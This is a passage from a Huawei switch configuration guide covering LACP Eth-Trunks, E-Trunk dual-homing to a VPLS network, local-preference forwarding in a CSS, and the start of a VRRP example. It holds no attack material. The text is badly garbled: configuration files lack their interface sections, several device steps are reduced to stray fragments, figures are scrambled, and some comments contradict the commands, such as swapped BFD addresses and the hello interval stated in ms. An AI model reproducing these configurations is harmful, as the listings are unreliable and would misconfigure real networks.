When Switches Are Directly Connected
Link Aggregation in LACP Mode

Ethernet link aggregation bundles multiple physical links to form a logical link to increase
link bandwidth. Link aggregation can work in manual mode or Link Aggregation Control
Protocol (LACP) mode.
If a high link bandwidth between two directly connected devices is required and devices
support LACP, the LACP mode is recommended. The LACP mode increases bandwidth,
improves reliability, implements load balancing, enhances Eth-Trunk fault tolerance, and
provides backup.
In LACP mode, some links are active links, and all the active links participate in data
forwarding. If an active link becomes faulty, a link is selected among inactive links as the
active link. That is, the number of links participating in data forwarding remains unchanged.

Configuration Notes
l Member interfaces of an Eth-Trunk must use the same Ethernet type and rate.
l Both devices of the Eth-Trunk must use the same number of physical interfaces,
interface rate, duplex mode, and flow control mode.
l If an interface of the local device is added to an Eth-Trunk, an interface of the remote
device directly connected to the interface of the local device must also be added to an
Eth-Trunk so that the two ends can communicate.
l Both devices of an Eth-Trunk must use the same link aggregation mode.
As shown in Figure 6-4, an LAG in LACP mode is configured on two directly connected
devices to improve bandwidth and reliability. The requirements are as follows:
l Two active links perform load balancing.
l One link functions as the backup link. When a fault occurs on the active link, the standby
link replaces the faulty link to ensure nonstop data transmission.
Figure 6-4 Networking for configuring link aggregation in LACP mode

SwitchA SwitchB
GE1/0/1 GE1/0/1
GE1/0/2 Eth-Trunk GE1/0/2
GE1/0/3 GE1/0/3
Active link
Backup link
1. Create an Eth-Trunk and configure the Eth-Trunk to work in LACP mode to implement
link aggregation.
2. Add member interfaces to the Eth-Trunk.
3. Set the system priority and determine the Actor so that the Partner selects active
interfaces based on the Actor interface priority.
4. Set the upper threshold for the number of active interfaces to improve reliability.
5. Set interface priorities and determine active interfaces so that interfaces with higher
priorities are selected as active interfaces.
Procedure
Step 1 Create Eth-Trunk 1 on SwitchA and configure Eth-Trunk 1 to work in LACP mode. The
configuration of SwitchB is similar to that of SwitchA, and is not mentioned here.
[SwitchA] interface eth-trunk 1 //Create Eth-Trunk 1.

[SwitchA-Eth-Trunk1] mode lacp //Configure link aggregation in LACP mode.

Step 2 Add member interfaces to Eth-Trunk 1 on SwitchA. The configuration of SwitchB is similar
to that of SwitchA, and is not mentioned here.
[SwitchA-GigabitEthernet1/0/1] eth-trunk 1 //Add GE1/0/1 to Eth-Trunk 1.
Step 3 Set the system LACP priority of SwitchA to 100 so that SwitchA becomes the Actor.
[SwitchA] lacp priority 100 //The default system LACP priority is 32768. Change
the LACP priority of SwitchA to be higher than that of SwitchB so that SwitchA
functions as the Actor.
Step 4 On SwitchA, set the upper threshold for the number of active interfaces to 2.
[SwitchA-Eth-Trunk1] max active-linknumber 2 //The defaulat upper threshold for
the number of active interfaces in the LAG is 8. Change the upper threshold for
the number of active interfaces to 2.
Step 5 Set the interface LACP priority and determine active links on SwitchA.
[SwitchA-GigabitEthernet1/0/1] lacp priority 100 //The default interface LACP
priority is 32768. Change the LACP priority of GE1/0/1 to 100 so that GE1/0/1
serves as the active interface.
[SwitchA-GigabitEthernet1/0/2] lacp priority 100 //The default interface LACP
priority is 32768. Change the LACP priority of GE1/0/2 to 100 so that GE1/0/2
serves as the active interface.

# Check information about the Eth-Trunk on each Switch and check whether link negotiation
is successful.
Local:
LAG ID: 1 WorkingMode: LACP
Preempt Delay: Disabled Hash arithmetic: According to SIP-XOR-DIP
System Priority: 100 System ID: 00e0-fca8-0417
Least Active-linknumber: 1 Max Active-linknumber: 2
Operate status: up Number Of Up Port In Trunk: 2
--------------------------------------------------------------------------------
ActorPortName Status PortType PortPri PortNo PortKey PortState Weight
GigabitEthernet1/0/1 Selected 1GE 100 6145 2865 11111100 1
GigabitEthernet1/0/2 Selected 1GE 100 6146 2865 11111100 1
GigabitEthernet1/0/3 Unselect 1GE 32768 6147 2865 11100000 1
Partner:
--------------------------------------------------------------------------------
ActorPortName SysPri SystemID PortPri PortNo PortKey PortState
GigabitEthernet1/0/1 32768 00e0-fca6-7f85 32768 6145 2609 11111100
The preceding information shows that the system LACP priority of SwitchA is 100 and is
higher than the system LACP priority of SwitchB. GigabitEthernet1/0/1 and

GigabitEthernet1/0/2 are active interfaces and are in Selected state. GigabitEthernet1/0/3 is in

Unselect state. In addition, load balancing and redundancy are implemented.
----End
Configuration Files
#
sysname SwitchA
#
lacp priority 100
#
mode lacp
max active-linknumber 2
#
eth-trunk 1
lacp priority 100
#
eth-trunk 1
lacp priority 100
#
eth-trunk 1
#
return

#
sysname SwitchB
#
mode lacp
#
eth-trunk 1
#
eth-trunk 1
#
eth-trunk 1
#
return
6.2.3 Example for Connecting an E-Trunk to a VPLS Network
E-Trunk Overview
Enhanced Trunk (E-Trunk) is an extension to LACP (a link aggregation protocol for a single
device) and implements link aggregation among multiple devices. E-Trunk achieves device-
level link reliability but not card-level link reliability.
When a CE is dual-homed to a VPLS, VLL, or PWE3 network, an E-Trunk can be configured

to protect the links between the CE and PEs and implement backup between PEs. If no E-
Trunk is configured, a CE can be connected to only one PE using an Eth-Trunk. If the Eth-
Trunk or the PE fails, the CE cannot communicate with the PE. After the E-Trunk is used, the
CE can be dual-homed to two PEs to implement backup.

Configuration Notes
l Devices must use link aggregation in LACP mode.
l As shown in Figure 6-5, the E-Trunk configuration on PE1 and PE2 must be the same.
The Eth-Trunks between PE1 and CE1 and between PE2 and CE1 must use the same rate
and duplex mode (key values must be the same) and join the same E-Trunk. After the
Eth-Trunks are added to the E-Trunk, ensure that the LACP priorities and system IDs of
PE1 and PE2 are the same. On CE1, CE1 interfaces directly connected to PE1 and PE2
must be added to the same Eth-Trunk. The Eth-Trunk can have a different Eth-Trunk ID
from that on the PEs. For example, the CE is configured with Eth-Trunk 20, while both
PEs are configured with Eth-Trunk 10.
l You must specify an IP address (loopback address recommended) for each PE to ensure
Layer 3 connectivity. Ensure that the peer IP address of a PE is the local IP address of
the other PE.
l The E-Trunk must be bound to a BFD session.
l You must set the same protocol packet password for PE1 and PE2.
If no E-Trunk is configured, a CE can be connected to only one PE using an Eth-Trunk. If the
Eth-Trunk or the PE fails, the CE cannot communicate with the PE. After an E-Trunk is
configured, the CE can be dual-homed to PEs. E-Trunk achieves device-level link reliability
but not card-level link reliability.
As shown in Figure 6-5, CE1 is connected to PE1 and PE2 using two Eth-Trunks in LACP
mode and is dual-homed to a VPLS network.
Initially, CE1 communicates with CE2 on the VPLS network through PE1. If PE1 or the Eth-
Trunk between CE1 and PE1 fails, CE1 cannot communicate with CE2. To prevent service
interruption, configure an E-Trunk on PE1 and PE2. When communication between CE1 and
PE1 fails, traffic is switched to PE2 so that CE1 can communicate with CE2 through PE2.
When PE1 or the Eth-Trunk between CE1 and PE1 recovers, traffic is switched back to PE1.
The E-Trunk implements backup of link aggregation groups (LAGs) between PE1 and PE2
and therefore improves network reliability.

Figure 6-5 Connecting an E-Trunk to a VPLS network

Loopback1
PE1
Eth-Trunk10
/1
Eth-Trunk20 E 1/0 GE
G /2 1/0
0/1 E 1/0 / 3 Loopback1
1/ G GE
GE /0/2 1 /0/
1 1
GE PE3
E-Trunk1
GE GE1/0/3
CE1 GE1 1/0
/0/ /3 /0/2 CE2
4 GE GE1
1/0 /0/3
GE
1/0 /1 G E1
/2
Eth-Trunk10
PE2
Loopback1
Switch Interface Layer 3 Interface IP Address
PE1 GigabitEthernet1/0/1 - -
- GigabitEthernet1/0/2 - -
- GigabitEthernet1/0/3 VLANIF 100 10.1.1.1/24
- Loopback1 - 1.1.1.9/32
PE2 GigabitEthernet1/0/1 - -
- Loopback1 - 2.2.2.9/32
PE3 GigabitEthernet1/0/1 VLANIF 100 10.1.1.2/24
- GigabitEthernet1/0/3 GigabitEthernet1/0/3.1 -
- Loopback1 - 3.3.3.9/32
CE1 GigabitEthernet1/0/1 - -

Switch Interface Layer 3 Interface IP Address
CE2 GigabitEthernet1/0/3 - -
1. Configure an E-Trunk as follows:
– Create Eth-Trunks in LACP mode between CE1 and PE1 and between CE1 and
PE2. Add member interfaces to the Eth-Trunks.
– Create an E-Trunk on PE1 and PE2 and add the two Eth-Trunks in LACP mode to
the E-Trunk.
– Set the following parameters of the E-Trunk:
n E-Trunk priority
n LACP system ID and LACP priority of the E-Trunk
n Interval at which Hello packets are sent
n Time multiplier for detecting Hello packets
n IP addresses of the local and remote ends
– Bind the E-Trunk to a BFD session.
2. Configure CE1 to connect to the VPLS network as follows:
– Configure a routing protocol on the backbone network to implement the
interworking between devices.
– Configure basic MPLS functions and LDP.
– Enable MPLS L2VPN on PEs.
– Configure a VSI and specify LDP as the signaling protocol.
– Create Eth-Trunk sub-interfaces and bind the VSI to the sub-interfaces.
Procedure
Step 1 Configure VLANs and IP addresses on the PW-side interfaces according to Figure 6-5.
Configure a routing protocol on the backbone network to implement the interworking
between devices. OSPF is used in this example.
# Configure aggregation switch PE1.
[HUAWEI] sysname PE1
[PE1] vlan batch 100
[PE1] interface gigabitethernet 1/0/3
[PE1-GigabitEthernet1/0/3] port link-type trunk
[PE1-GigabitEthernet1/0/3] port trunk allow-pass vlan 100

[PE1-GigabitEthernet1/0/3] quit
[PE1] interface vlanif 100
[PE1-Vlanif100] ip address 10.1.1.1 24
[PE1-Vlanif100] quit
[PE1] interface loopback 1
[PE1-LoopBack1] ip address 1.1.1.9 32
[PE1-LoopBack1] quit
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 1.1.1.9 0.0.0.0
[PE1-ospf-1-area-0.0.0.0] quit
[PE1-ospf-1] quit

[PE2] vlan batch 200
[PE2] ospf 1
[PE2-ospf-1] area 0
[PE2-ospf-1] quit

[PE3] vlan batch 100 200
[PE3] ospf 1
[PE3-ospf-1] area 0
[PE3-ospf-1] quit
After the configuration is complete, PE1, PE2, and PE3 use OSPF to discover IP routes to
Loopback1 of one another, and can ping one another. Run the display ip routing-table

command on PE1, PE2, and PE3. You can see that the PEs have learned the routes to one
another.
NOTE
l The AC-side interface and PW-side interface of a PE cannot be added to the same VLAN; otherwise,
a loop may occur.
l When configuring OSPF, configure PE1, PE2, and PE3 to advertise 32-bit loopback addresses.
Step 2 Configure Eth-Trunks in LACP mode on user-side switch CE1, PE1, and PE2, and add
member interfaces to the Eth-Trunks. Configure Layer 2 forwarding on CE1.
# Configure CE1.
[HUAWEI] sysname CE1
[CE1] vlan batch 10
[CE1] interface eth-trunk 20 //Create Eth-Trunk 20 and enter the view of Eth-
Trunk 20.
[CE1-Eth-Trunk20] port link-type trunk //Set the link type of the interface to
trunk.
[CE1-Eth-Trunk20] port trunk allow-pass vlan 10 //Add Eth-Trunk 20 to VLAN 10.
[CE1-Eth-Trunk20] mode lacp //Configure Eth-Trunk 20 to work in LACP mode.
[CE1-Eth-Trunk20] trunkport GigabitEthernet 1/0/1 to 1/0/4 //Add GE1/0/1 to
GE1/0/4 to Eth-Trunk20.
[CE1-Eth-Trunk20] quit
# Configure PE1.
[PE1] interface eth-trunk 10 //Create Eth-Trunk 10 and enter the view of Eth-
Trunk 10.
[PE1-Eth-Trunk10] port link-type trunk //Set the link type of the interface to
trunk.
[PE1-Eth-Trunk10] mode lacp //Configure Eth-Trunk 10 to work in LACP mode.
[PE1-Eth-Trunk10] trunkport GigabitEthernet 1/0/1 to 1/0/2 //Add GE1/0/1 and
[PE1-Eth-Trunk10] quit
# Configure PE2.
[PE2] interface eth-trunk 10 //Create Eth-Trunk 10 and enter the view of Eth-
Trunk 10.
[PE2-Eth-Trunk10] port link-type trunk //Set the link type of the interface to
trunk.
[PE2-Eth-Trunk10] mode lacp //Configure Eth-Trunk 10 to work in LACP mode.
[PE2-Eth-Trunk10] trunkport GigabitEthernet 1/0/1 to 1/0/2 //Add GE1/0/1 and
Step 3 Create an E-Trunk and set the LACP priority, LACP system ID, E-Trunk priority, time
multiplier for detecting hello packets, interval at which hello packets are sent, and local and
remote IP addresses.
# Configure PE1.
[PE1] e-trunk 1 //Create E-Trunk 1 and enter the view of E-Trunk 1.
[PE1-e-trunk-1] quit
[PE1] lacp e-trunk priority 1 //Set the LACP priority of E-Trunk 1 to 1.
[PE1] lacp e-trunk system-id 00E0-FC00-0000 //Set the LACP system ID of E-Trunk 1
to 00E0-FC00-0000.
[PE1] e-trunk 1 //Enter the view of E-Trunk 1.
[PE1-e-trunk-1] priority 10 //Set the priority of E-Trunk 1 to 10.
[PE1-e-trunk-1] timer hold-on-failure multiplier 3 //Set the time multiplier for
detecting hello packets to 3.
[PE1-e-trunk-1] timer hello 9 //Set the interval at which hello packets are sent
to 9 ms.
[PE1-e-trunk-1] peer-address 2.2.2.9 source-address 1.1.1.9 //Set the remote IP

address to 2.2.2.9 and local IP address to 1.1.1.9.

# Configure PE2.
[PE2] e-trunk 1 //Create E-Trunk 1 and enter the view of E-Trunk 1.
[PE2] lacp e-trunk priority 1 //Set the LACP priority of E-Trunk 1 to 1.
[PE2] lacp e-trunk system-id 00E0-FC00-0000 //Set the LACP system ID of E-Trunk 1
to 00E0-FC00-0000.
[PE2-e-trunk-1] priority 20 //Set the priority of E-Trunk 1 to 20.
[PE2-e-trunk-1] timer hold-on-failure multiplier 3 //Set the time multiplier for
detecting hello packets to 3.
[PE2-e-trunk-1] timer hello 9 //Set the interval at which hello packets are sent
to 9 ms.
[PE2-e-trunk-1] peer-address 1.1.1.9 source-address 2.2.2.9 //Set the remote IP
address to 1.1.1.9 and local IP address to 2.2.2.9.
Step 4 Add the Eth-Trunks in LACP mode to the E-Trunk.

# Configure PE1.
[PE1] interface eth-trunk 10 //Enter the view of Eth-Trunk 10.
[PE1-Eth-Trunk10] e-trunk 1 //Add Eth-Trunk 10 to E-Trunk 1.
# Configure PE2.
[PE2] interface eth-trunk 10 //Enter the view of Eth-Trunk 10.
[PE2-Eth-Trunk10] e-trunk 1 //Add Eth-Trunk 10 to E-Trunk 1.
Step 5 Bind the E-Trunk to a BFD session.

l Create a BFD session.
# Configure PE1.
[PE1] bfd //Enable BFD.
[PE1-bfd] quit
[PE1] bfd hello1 bind peer-ip 2.2.2.9 source-ip 1.1.1.9 //Create a BFD
session named hello1 and bind the BFD session to remote IP address 1.1.1.9
and local IP address 2.2.2.9.
[PE1-bfd-session-hello1] discriminator local 1 //Set the local discriminator
to 1.
[PE1-bfd-session-hello1] discriminator remote 2 //Set the remote
discriminator to 2.
[PE1-bfd-session-hello1] commit //Commit the BFD session configuration.
[PE1-bfd-session-hello1] quit
The IP addresses of the local and remote ends of a BFD session must be the same as
those of the E-Trunk.
# Configure PE2.
[PE2] bfd
[PE2-bfd] quit
[PE2] bfd hello2 bind peer-ip 1.1.1.9 source-ip 2.2.2.9 //Create a BFD
session named hello2 and bind the BFD session toremote IP address 1.1.1.9 and
local IP address 2.2.2.9.
[PE2-bfd-session-hello2] discriminator local 2 //Set the local discriminator
to 2.
[PE2-bfd-session-hello2] discriminator remote 1 //Set the remote
discriminator to 1.
[PE2-bfd-session-hello2] commit //Commit the BFD session configuration.
[PE2-bfd-session-hello2] quit
l Bind E-Trunk 1 to the BFD session.

# Configure PE1.


[PE1-e-trunk-1] e-trunk track bfd-session session-name hello1 //Bind E-Trunk
1 to the BFD session hello1.
# Configure PE2.
[PE2-e-trunk-1] e-trunk track bfd-session session-name hello2 //Bind E-Trunk
1 to the BFD session hello2.
Step 6 Configure PEs so that CE1 can access the VPLS network.
1. Configure basic MPLS functions and LDP on PE1, PE2, and PE3.
# Configure PE1.
[PE1] mpls lsr-id 1.1.1.9 //Set the LSR ID to 1.1.1.9.
[PE1] mpls //Enable global MPLS.
[PE1-mpls] quit
[PE1] mpls ldp //Enable global LDP.
[PE1-mpls-ldp] quit
[PE1-Vlanif100] mpls //Enable MPLS on an interface.
[PE1-Vlanif100] mpls ldp //Enable LDP on an interface.
# Configure PE2.
[PE2-mpls] quit
[PE2-mpls-ldp] quit
# Configure PE3.
[PE3-mpls] quit
[PE3-mpls-ldp] quit
After the configuration is complete, run the display mpls ldp session command on PEs.
You can see that the status of the remote LDP peer relationship is Operational,
indicating that remote LDP sessions are set up.
2. Enable MPLS L2VPN on PE1, PE2, and PE3.
# Configure PE1.
[PE1] mpls l2vpn //Enable global MPLS L2VPN.
[PE1-l2vpn] quit
# Configure PE2.
[PE2-l2vpn] quit
# Configure PE3.
[PE3-l2vpn] quit

3. Create a VSI ldp1 on PE1, PE2, and PE3 and specify LDP as the signaling protocol in
the VSI.
# Configure PE1.
[PE1] vsi ldp1 static //Create a VSI named ldp1 and configure static member
discovery.
[PE1-vsi-ldp1] pwsignal ldp //Set the signaling mode to LDP.
[PE1-vsi-ldp1-ldp] vsi-id 2 //Set the ID of the VSI to 2.
[PE1-vsi-ldp1-ldp] peer 3.3.3.9 //Set the peer address of the VSI to 3.3.3.9.
[PE1-vsi-ldp1-ldp] quit
[PE1-vsi-ldp1] quit
# Configure PE2.
discovery.
[PE2-vsi-ldp1] quit
# Configure PE3.
discovery.
[PE3-vsi-ldp1] quit
4. Configure Eth-Trunk sub-interfaces on PE1 and PE2, and bind the VSI to the Eth-Trunk
sub-interfaces.
# Configure PE1.
[PE1] interface Eth-Trunk 10.1 //Create Eth-Trunk 10.1 and enter the view of
Eth-Trunk 10.1.
[PE1-Eth-Trunk10.1] dot1q termination vid 10 //Set the single VLAN ID for
dot1q encapsulation on Eth-Trunk 10.1 to VLAN 10.
[PE1-Eth-Trunk10.1] l2 binding vsi ldp1 //Bind Eth-Trunk 10.1 to the VSI ldp1.
[PE1-Eth-Trunk10.1] quit
# Configure PE2.
[PE2] interface Eth-Trunk 10.1 //Create Eth-Trunk 10.1 and enter the view of
Eth-Trunk 10.1.
[PE2-Eth-Trunk10.1] dot1q termination vid 10 //Set the single VLAN ID for
dot1q encapsulation on Eth-Trunk 10.1 to VLAN 10.
[PE2-Eth-Trunk10.1] l2 binding vsi ldp1 //Bind Eth-Trunk 10.1 to the VSI ldp1.
[PE2-Eth-Trunk10.1] quit
5. Configure a sub-interface on PE3 and bind the VSI to the sub-interface.
# Configure PE3.
[PE3] interface gigabitethernet 1/0/3.1 //Create GE1/0/3.1 and enter the view
of GE1/0/3.1.
[PE3-GigabitEthernet1/0/3.1] dot1q termination vid 10 //Set the single VLAN
ID for dot1q encapsulation on GE1/0/3.1 to VLAN 10.
[PE3-GigabitEthernet1/0/3.1] l2 binding vsi ldp1 //Bind GE1/0/3.1 to the VSI
ldp1.
[PE3-GigabitEthernet1/0/3.1] quit

l Run the display eth-trunk command on CE1 to check the Eth-Trunk configuration.
l Run the display e-trunk command to check information about the E-Trunk.
# Check information about E-Trunk 1 on PE1.
[PE1] display e-trunk 1
The E-Trunk information

E-TRUNK-ID : 1 Revert-Delay-Time (s) : 120

Priority : 10 System-ID : 00e0-0f74-eb00
Peer-IP : 2.2.2.9 Source-IP : 1.1.1.9
State : Master Causation : PRI
Send-Period (100ms) : 9 Fail-Time (100ms) : 27
Receive : 41 Send : 42
RecDrop : 0 SndDrop : 0
Peer-Priority : 20 Peer-System-ID : 00e0-3b6c-6100
Peer-Fail-Time (100ms) : 27 BFD-Session : hello1
Description : -
------------------------------------------------------------------------------
--
The Member
information
Type ID LocalPhyState Work-Mode State Causation Remote-
ID
Eth-Trunk 10 Up auto Master ETRUNK_MASTER 10
# Check information about E-Trunk 1 on PE2.

[PE2] display e-trunk 1
The E-Trunk information
E-TRUNK-ID : 1 Revert-Delay-Time (s) : 120
Priority : 20 System-ID : 00e0-3b6c-6100
Peer-IP : 1.1.1.9 Source-IP : 2.2.2.9
State : Backup Causation : PRI
Send-Period (100ms) : 9 Fail-Time (100ms) : 27
Receive : 43 Send : 42
RecDrop : 3 SndDrop : 0
Peer-Priority : 10 Peer-System-ID : 00e0-0f74-eb00
Peer-Fail-Time (100ms) : 27 BFD-Session : hello2
Description : -
------------------------------------------------------------------------------
--
The Member
information
Type ID LocalPhyState Work-Mode State Causation Remote-
ID
Eth-Trunk 10 Down auto Backup ETRUNK_BACKUP 10
The preceding information shows that the E-Trunk priority on PE1 is 10, and the E-
Trunk status is Master; the E-Trunk priority on PE2 is 20, and the E-Trunk status is
Backup. Device backup is implemented.
----End
Configuration Files
l Configuration file of CE1
#
sysname CE1
#
vlan batch 10
#
mode lacp
#
eth-trunk 20
#
eth-trunk 20
#
eth-trunk 20
#

eth-trunk 20
#
return
l Configuration file of PE1
#
sysname PE1
#
vlan batch 100
#
lacp e-trunk system-id 00e0-fc00-0000
lacp e-trunk priority 1
#
bfd
#
mpls lsr-id 1.1.1.9
mpls
#
mpls l2vpn
#
vsi ldp1 static
pwsignal ldp
vsi-id 2
peer 3.3.3.9
#
mpls ldp
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
mpls
mpls ldp
#
e-trunk 1
priority 10
peer-address 2.2.2.9 source-address 1.1.1.9
timer hello 9
timer hold-on-failure multiplier 3
e-trunk track bfd-session session-name hello1
#
mode lacp
e-trunk 1
#
l2 binding vsi ldp1
#
eth-trunk 10
#
eth-trunk 10
#
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bfd hello1 bind peer-ip 2.2.2.9 source-ip 1.1.1.9
commit
#
ospf 1
area 0.0.0.0
network 1.1.1.9 0.0.0.0
network 10.1.1.0 0.0.0.255

#
return

#
sysname PE2
#
vlan batch 200
#
lacp e-trunk system-id 00e0-fc00-0000
lacp e-trunk priority 1
#
bfd
#
mpls lsr-id 2.2.2.9
mpls
#
mpls l2vpn
#
vsi ldp1 static
pwsignal ldp
vsi-id 2
peer 3.3.3.9
#
mpls ldp
#
interface Vlanif200
ip address 10.1.2.1 255.255.255.0
mpls
mpls ldp
#
e-trunk 1
priority 20
peer-address 1.1.1.9 source-address 2.2.2.9
timer hello 9
timer hold-on-failure multiplier 3
e-trunk track bfd-session session-name hello2
#
mode lacp
e-trunk 1
#
l2 binding vsi ldp1
#
eth-trunk 10
#
eth-trunk 10
#
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
bfd hello2 bind peer-ip 1.1.1.9 source-ip 2.2.2.9
commit
#
ospf 1
area 0.0.0.0
network 2.2.2.9 0.0.0.0
network 10.1.2.0 0.0.0.255

#
return

#
sysname PE3
#
vlan batch 100 200
#
mpls lsr-id 3.3.3.9
mpls
#
mpls l2vpn
#
vsi ldp1 static
pwsignal ldp
vsi-id 2
peer 1.1.1.9
peer 2.2.2.9
#
mpls ldp
#
interface Vlanif100
ip address 10.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif200
ip address 10.1.2.2 255.255.255.0
mpls
mpls ldp
#
#
#
interface GigabitEthernet1/0/3.1
l2 binding vsi ldp1
#
interface LoopBack1
ip address 3.3.3.9 255.255.255.255
#
ospf 1
area 0.0.0.0
network 3.3.3.9 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
#
return
6.2.4 Example for Configuring an Eth-Trunk Interface to

Preferentially Forward Local Traffic
Preferentially Forwarding Local Traffic on an Eth-Trunk

In a CSS, an Eth-Trunk is configured as the outbound interface of traffic to ensure reliable
transmission. Member interfaces of the Eth-Trunk are located on different chassis. When
devices in the CSS forward traffic, the Eth-Trunk may select an inter-chassis member
interface based on the hash algorithm. The cable bandwidth between devices in the CSS is
limited, so inter-chassis traffic forwarding occupies bandwidth resources between devices,

lowering traffic forwarding efficiency. To address this issue, you can enable an Eth-Trunk to
preferentially forward local traffic.
Configuration Notes
l If active interfaces of an Eth-Trunk on the local device have sufficient bandwidth to
forward traffic, you can configure the Eth-Trunk to preferentially forward local traffic.
This function improves traffic forwarding efficiency and increases bandwidth capacity
between devices in the CSS.
l If active interfaces of an Eth-Trunk on the local device do not have sufficient bandwidth
to forward traffic, you can configure the Eth-Trunk not to preferentially forward local
traffic. In this case, some traffic on the local device is forwarded through member
interfaces of an Eth-Trunk on another device, preventing packet loss.
On the network shown in Figure 6-6, CSS technology is used to increase the total capacity of
devices. Switch3 and Switch4 are connected through stack cables to form a logical switch. To
implement backup between devices and improve reliability, physical interfaces on the two
switches are added to an Eth-Trunk. In normal situations, when checking information about
member interfaces on the PE, you can see that traffic from VLAN 2 and VLAN 3 is
forwarded through GE1/0/1 and GE1/0/2 respectively. This increases bandwidth capacity
between devices and reduces traffic forwarding efficiency.
To ensure that traffic from VLAN 2 is forwarded through GE1/0/1 and traffic from VLAN 3
is forwarded through GE1/0/2, you can configure the Eth-Trunk to preferentially forward
local traffic.

Figure 6-6 Preferentially forwarding local traffic
N e tw o rk
PE
G E 1 /0 /1 G E 1 /0 /2
E th -T ru n k 1 0
G E 1 /1 /0 /4 G E 2 /1 /0 /4 CSS
S w itc h 3 G E 1 /1 /0 /3 G E 2 /1 /0 /3 S w itc h 4
G E 1 /0 /2 G E 1 /0 /2
S w itc h 1
S w itc h 2
G E 1 /0 /1 G E 1 /0 /1
VLAN 2 VLAN 3
C S S ca b le
V L A N 2 d a ta flo w
V L A N 3 d a ta flo w
1. Create an Eth-Trunk.
2. Add member interfaces to the Eth-Trunk.
3. Enable the Eth-Trunk to preferentially forward local traffic.
4. Add interfaces to VLANs to implement Layer 2 connectivity.
Procedure
Step 1 Create an Eth-Trunk and configure the ID of a VLAN from which packets can pass through
the Eth-Trunk.
[HUAWEI] sysname CSS
[CSS] interface eth-trunk 10 //Create Eth-Trunk 10 and enter the view of Eth-
Trunk 10.
[CSS-Eth-Trunk10] port link-type trunk //Set the link type of the interface to
trunk.
[CSS-Eth-Trunk10] port trunk allow-pass vlan all //Configure the interface to

allow all VLANs.

# Configure the aggregation switch PE.

[HUAWEI] sysname PE
[PE] interface eth-trunk 10 //Create Eth-Trunk 10 and enter the view of Eth-Trunk
10.
[PE-Eth-Trunk10] port link-type trunk //Set the link type of the interface to
trunk.
[PE-Eth-Trunk10] port trunk allow-pass vlan all //Configure the interface to
allow all VLANs.
[PE-Eth-Trunk10] quit
Step 2 Add member interfaces to the Eth-Trunk.

[CSS-GigabitEthernet1/1/0/4] eth-trunk 10 //Add GE1/1/0/4 to Eth-Trunk 10.
[CSS-GigabitEthernet2/1/0/4] eth-trunk 10 //Add GE2/1/0/4 to Eth-Trunk 10.
# Configure the PE.

[PE] interface gigabitethernet 1/0/1
[PE-GigabitEthernet1/0/1] eth-trunk 10 //Add GE1/0/1 to Eth-Trunk 10.
[PE-GigabitEthernet1/0/1] quit
[PE] interface gigabitethernet 1/0/2
[PE-GigabitEthernet1/0/2] eth-trunk 10 //Add GE1/0/2 to Eth-Trunk 10.
[PE-GigabitEthernet1/0/2] quit
Step 3 Configure the Eth-Trunk on devices in the CSS to preferentially forward local traffic.
[CSS-Eth-Trunk10] local-preference enable //Enable Eth-Trunk 10 to preferentially
forward local traffic.
NOTE
By default, an Eth-Trunk is enabled to preferentially forward local traffic. If the local-preference enable
command is executed, the system displays the message "Error: The local preferential forwarding mode
has been configured."
Step 4 Configure Layer 2 forwarding.

[CSS-GigabitEthernet1/1/0/3] port link-type trunk
[CSS-GigabitEthernet1/1/0/3] port trunk allow-pass vlan 2
[CSS-GigabitEthernet2/1/0/3] port link-type trunk
[CSS-GigabitEthernet2/1/0/3] port trunk allow-pass vlan 3
# Configure access switch Switch1.

[HUAWEI] sysname Switch1
[Switch1] vlan 2
[Switch1-vlan2] quit
[Switch1] interface gigabitethernet 1/0/1
[Switch1-GigabitEthernet1/0/1] port link-type trunk
[Switch1-GigabitEthernet1/0/1] port trunk allow-pass vlan 2

[Switch1-GigabitEthernet1/0/1] quit
# Configure access switch Switch2.

[Switch2] vlan 3
After the configuration is complete, run the display trunkmembership eth-trunk command
in any view to check information about member interfaces of the Eth-Trunk.
The display on the CSS is used as an example.

<CSS> display trunkmembership eth-trunk 10
Trunk ID: 10
Used status: VALID
TYPE: ethernet
Working Mode : Normal
Number Of Ports in Trunk = 2
Number Of Up Ports in Trunk = 2
Operate status: up
Interface GigabitEthernet1/1/0/4, valid, operate up, weight=1

----End
Configuration Files
l Configuration file of the CSS
#
sysname CSS
#
vlan batch 2 3
#
port trunk allow-pass vlan 2 to 4094
#
#
#
eth-trunk 10
#
eth-trunk 10

#
return
l Configuration file of the PE

#
sysname PE
#
#
eth-trunk 10
#
eth-trunk 10
#
return
l Configuration file of Switch1

#
sysname Switch1
#
vlan batch 2
#
#
#
return

#
sysname Switch2
#
vlan batch 3
#
#
#
return
6.2.5 Example for Configuring an Eth-Trunk and Association

Between VRRP and the Interface Status
Association Between VRRP and the Interface Status

Additional technologies are required to enhance the VRRP active/standby function. For
example, when the link from the master to a network is disconnected, VRRP cannot detect the
fault and an active/standby switchover cannot be performed. As a result, hosts cannot
remotely access the network through the master. To address this issue, you can configure
association between VRRP and the interface status.
When the master detects that the uplink interface fails, the master reduces its priority to be
lower than the priority of the backup and immediately sends VRRP packets. After the backup

receives the VRRP packets, it detects that the priority in the VRRP packets is lower than its
priority and switches to the master. This ensures correct traffic forwarding.
Configuration Notes
l Ensure that each device of the same VRRP group is configured with the same VRID.
l A VRRP group can be associated with a maximum of eight interfaces on a device.
Association between a VRRP group and the interface status cannot be configured on the
device as the IP address owner.
l The following describes the applicable product models and versions.
Table 6-1 Applicable product models and versions

Prod Product Software Version
uct Model
S1270 S12708 and V200R005C00, V200R006C00, V200R007C00,

0 S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
To know details about software mappings, see Switch Software Mapping Search.
As shown in Figure 6-7, the user hosts are dual-homed to SwitchA and SwitchB through the
switch. The requirements are as follows:
l The hosts use SwitchA as the default gateway to connect to the Internet. When SwitchA
or the downlink/uplink fails, SwitchB functions as the gateway to implement gateway
backup.
l The bandwidth of the link between SwitchA and SwitchB is increased to implement link
backup and improve link reliability.
l After SwitchA recovers, it becomes the gateway within 20s.
Figure 6-7 Networking of association between VRRP and the interface status
A g g re g a tio n la y e r C o re la y e r
S w itc h A
M a s te r
VLAN 101~ G E 1 /0 /1
G E 1 /0 /2 1 9 2 .1 6 8 .1 .1 /2 4
